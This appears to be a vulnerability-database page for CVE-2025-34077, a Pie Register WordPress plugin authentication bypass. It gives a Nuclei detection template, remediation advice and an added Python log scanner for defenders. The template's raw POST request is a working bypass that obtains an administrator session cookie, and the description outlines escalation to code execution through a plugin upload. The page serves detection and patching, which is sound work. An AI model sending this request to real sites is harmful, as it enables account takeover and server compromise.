WordPress Pie Register <= 3.7.1.4 - Authentication Bypass

05 Jul 2026 03:01:21 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Authentication bypass in WordPress Pie Register plugin allows attackers to impersonate users remotely.

Related

Reporter | Title | Published | Family
GithubExploit | wp-pie-exploit | 13 Apr 2026 17:37 | githubexploit
GithubExploit | Exploit for CVE-2025-34077 | 9 Jul 2025 22:37 | githubexploit
GithubExploit | Ntemplatesbyxit | 7 May 2026 15:36 | githubexploit
GithubExploit | Exploit for CVE-2025-34077 | 28 Jul 2025 20:05 | githubexploit
Circl | CVE-2025-34077 | 2 Nov 2021 14:37 | circl
CNNVD | WordPress plugin Pie Register security vulnerability | 9 Jul 2025 00:00 | cnnvd
CVE | CVE-2025-34077 | 9 Jul 2025 00:49 | cve
Cvelist | CVE-2025-34077 WordPress Pie Register Plugin ≤ 3.7.1.4 Authentication Bypass RCE | 9 Jul 2025 00:49 | cvelist
Exploit DB | Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE | 22 Jul 2025 00:00 | exploitdb
EUVD | EUVD-2025-20764 | 9 Jul 2025 00:49 | euvd

id: CVE-2025-34077

info:
  name: WordPress Pie Register <= 3.7.1.4 - Authentication Bypass
  author: kylew1004
  severity: critical
  description: |
    An authentication bypass vulnerability exists in the WordPress Pie Register plugin ≤ 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators. Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.
  impact: |
    Unauthenticated attackers can impersonate any user including administrators by manipulating the user_id_social_site parameter, potentially leading to complete site takeover through malicious plugin uploads.
  remediation: |
    Upgrade WordPress Pie Register plugin to version 3.7.2.0 or later that properly validates social login authentication.
  reference:
    - https://github.com/MrjHaxcore/CVE-2025-34077
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34077
    - https://securityvulnerability.io/vulnerability/CVE-2025-34077
  classification:
    epss-score: 0.09903
    epss-percentile: 0.95002
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/pie-register/"
  tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null

    matchers:
      - type: dsl
        dsl:
          - "contains(set_cookie,'wordpress_logged_in_')"
          - "status_code==302"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Dashboard","Plugins","Edit Profile")'
        condition: and
# digest: 4a0a0047304502200764347de21b31f575616e8ed67e1e251419916987bafdc9736e1a53c3ddd307022100e72d352095b4d46a807c7cb125e21f96e432cd19367e1b648fe15481354a4406:922c64590222798bb761d5b6d8e72950
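
The template's first matcher, seen from the defender's side: an added example (not part of the template or of ProjectDiscovery's code) that scans request logs for the same parameter combination and response condition. The JSON log schema, the function names and the sample records are assumptions constructed for illustration.

```python
import json
from urllib.parse import parse_qs

# Constructed sample records; the field names are an assumed log schema
# (a reverse proxy or WAF that records POST bodies and response headers).
SAMPLE_LOG = """\
{"ts":"2025-07-10T08:01:12Z","src":"203.0.113.7","method":"POST","path":"/","body":"user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null","status":302,"set_cookie":"wordpress_logged_in_abc=redacted"}
{"ts":"2025-07-10T08:02:40Z","src":"198.51.100.23","method":"POST","path":"/login/","body":"log=alice&pwd=redacted&_wp_http_referer=/login/","status":302,"set_cookie":"wordpress_logged_in_abc=redacted"}
{"ts":"2025-07-10T08:05:03Z","src":"203.0.113.7","method":"POST","path":"/","body":"social_site=TRUE&user_id_social_site=2","status":200,"set_cookie":""}
{"ts":"2025-07-10T08:06:00Z","src":"192.0.2.9","method":"GET","path":"/?social_site=true","body":"","status":200,"set_cookie":""}
not-json garbage line
"""

def classify(record):
    """Return (target_user_id, verdict) for a suspicious request, else None."""
    if record.get("method") != "POST":
        return None
    params = parse_qs(record.get("body", ""), keep_blank_values=True)
    social = [v.lower() for v in params.get("social_site", [])]  # over-match on case
    if "true" not in social or "user_id_social_site" not in params:
        return None
    # Same success condition as the template's first matcher: 302 plus login cookie.
    issued = (record.get("status") == 302
              and "wordpress_logged_in_" in record.get("set_cookie", ""))
    uid = params["user_id_social_site"][0]
    return (uid, "session_issued" if issued else "attempt")

def scan(log_text):
    """Return (timestamp, source, target_user_id, verdict) for each flagged line."""
    findings = []
    for line in log_text.splitlines():
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the scan
        if not isinstance(record, dict):
            continue
        hit = classify(record)
        if hit:
            findings.append((record.get("ts"), record.get("src"), *hit))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

A `session_issued` verdict means a login cookie was returned to that request, so the sessions of the targeted user ID should be invalidated and the plugin upgraded to 3.7.2.0 or later.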


04 Feb 2026 07:00 (current)
Vulners AI Score: 8 (High risk)
CVSS 4: 10
EPSS: 0.09903